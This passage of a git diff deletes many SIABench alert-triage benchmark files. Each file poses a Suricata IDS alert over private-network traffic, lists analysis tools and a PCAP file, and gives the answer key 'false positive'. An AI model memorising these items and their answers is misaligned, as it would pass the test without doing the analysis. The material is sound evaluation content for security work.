adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236042.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236042.json deleted file mode 100644 index d64b07c43eb109376821d983e60062d0bf9183cd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236042.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236042", - "alert_type": "False", - "alert_name": "dp_236042" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:43:32.740109+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:59052", - "alert": "1970-01-01T00:43:32.740109+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:59052", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236110.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236110.json deleted file mode 100644 index 0151f7cefd14aaba363c8134a83d44225e654d4a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236110.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236110", - "alert_type": "False", - "alert_name": "dp_236110" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:51:02.895251+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:36884 -> 192.168.1.70:8080", - "alert": "1970-01-01T05:51:02.895251+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:36884 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236114.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236114.json deleted file mode 100644 index 94b8a1e1e6d08d69655d8a15a18f27d64902c4f4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236114.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236114", - "alert_type": "False", - "alert_name": "dp_236114" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:51:38.642031+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:51:38.642031+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236115.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236115.json deleted file mode 100644 index eb924181ea95c02d53f04fdf27739873ccdf258c..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236115.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236115", - "alert_type": "False", - "alert_name": "dp_236115" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:51:38.645198+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:51:38.645198+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236116.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236116.json deleted file mode 100644 index 37061f3e15167176d93e6e46902b426b9349df32..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236116.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236116", - "alert_type": "False", - "alert_name": "dp_236116" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:16.348545+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:16.348545+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236117.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236117.json deleted file mode 100644 index cf7dea19d83f22ddae6398d9b2e3b74d2fd967e8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236117.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236117", - "alert_type": "False", - "alert_name": "dp_236117" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:36.700833+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:36.700833+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236118.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236118.json deleted file mode 100644 index 9cba8ff624a8ce93972aea21bc763694d2a271b3..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236118.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236118", - "alert_type": "False", - "alert_name": "dp_236118" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:36.704244+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:36.704244+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236119.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236119.json deleted file mode 100644 index 064ebf327c19859c79bf1cefe65cc14345cf1884..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236119.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236119", - "alert_type": "False", - "alert_name": "dp_236119" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:40.079882+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:40.079882+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236120.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236120.json deleted file mode 100644 index 16d8b4e4002f8e64d4876e06c9e2b3ce131480f8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236120.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236120", - "alert_type": "False", - "alert_name": "dp_236120" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:40.085525+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:40.085525+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236121.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236121.json deleted file mode 100644 index 91e0729b4fe90901759299e9e77f2f27194252cd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236121.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236121", - "alert_type": "False", - "alert_name": "dp_236121" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:17.788844+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:17.788844+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236122.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236122.json deleted file mode 100644 index f2cb0cac01a2c46f0be0e2a2363e7a534f7aa2b8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236122.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236122", - "alert_type": "False", - "alert_name": "dp_236122" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:38.139937+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:38.139937+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236123.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236123.json deleted file mode 100644 index 57bf625c7f7a85b1a9ffa91f572631e63d9b992b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236123.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236123", - "alert_type": "False", - "alert_name": "dp_236123" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:38.144878+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:38.144878+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236124.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236124.json deleted file mode 100644 index a4e3bcc394834b897222c1ed09cc65ea32e9e772..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236124.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236124", - "alert_type": "False", - "alert_name": "dp_236124" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:41.519489+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:41.519489+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236125.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236125.json deleted file mode 100644 index 35d7488c44a46e9e518d41ab5c70d51118f07e69..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236125.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236125", - "alert_type": "False", - "alert_name": "dp_236125" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:41.522243+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:41.522243+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236126.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236126.json deleted file mode 100644 index 4c7307b0f8d1836263e0059d121a2228f89f6d7b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236126.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236126", - "alert_type": "False", - "alert_name": "dp_236126" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:15.743056+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:33454 -> 192.168.1.70:8080", - "alert": "1970-01-01T05:54:15.743056+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:33454 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236127.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236127.json deleted file mode 100644 index 80e05a558dc54d02a21267175fe42c7f0bae1a8f..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236127.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236127", - "alert_type": "False", - "alert_name": "dp_236127" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:19.228942+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:19.228942+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236128.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236128.json deleted file mode 100644 index e536a3e9b655ae5869343861ba2e6bd0a7baa05c..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236128.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236128", - "alert_type": "False", - "alert_name": "dp_236128" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:39.579439+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:39.579439+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236129.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236129.json deleted file mode 100644 index 43b2e900f2dd633c66ca658fcd55908855759996..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236129.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236129", - "alert_type": "False", - "alert_name": "dp_236129" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:39.585656+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:39.585656+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236130.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236130.json deleted file mode 100644 index a43f1c380addb03e887706d07adec9c2c2b0971d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236130.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236130", - "alert_type": "False", - "alert_name": "dp_236130" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:42.959934+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:42.959934+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236131.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236131.json deleted file mode 100644 index a37d6cb2bd8a65e102ac1698cd30586984000d03..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236131.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236131", - "alert_type": "False", - "alert_name": "dp_236131" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:42.966420+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:42.966420+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236132.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236132.json deleted file mode 100644 index bbf1435e8cee8f6a98db21e6ccbbb291339fd521..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236132.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236132", - "alert_type": "False", - "alert_name": "dp_236132" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:20.668850+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:20.668850+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git 